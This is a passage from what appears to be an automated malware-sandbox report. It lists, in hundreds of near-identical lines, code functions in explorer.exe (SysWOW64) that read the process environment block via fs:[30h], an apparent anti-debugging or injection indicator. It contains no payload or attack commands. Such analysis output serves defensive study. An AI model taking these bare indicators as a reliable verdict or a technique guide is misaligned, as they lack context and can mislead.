          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05642D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05642D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05642D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05642D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05642D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05642D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05642D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0561C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0561C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0565740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0565740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0565740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05606C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05606C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05606C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05606C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05606CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05606CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05606CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05658CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05658F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0565070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0565070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0561FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0561FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05584F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05584F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05598794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05607794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05607794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05607794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05597E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05597E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05597E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05597E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05597E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05597E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0563FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05641608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0563FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05658ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05650EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05650EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05650EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0561FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05589100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05589100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05589100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05651074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05642073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05654015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05654015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05607016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05607016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05607016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0561B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0561B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0561B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0561B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0561B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0561B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05589080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05603884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05603884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05658B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056323E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056323E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056323E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056053CA mov eax, dword ptr fs:[00000030h]
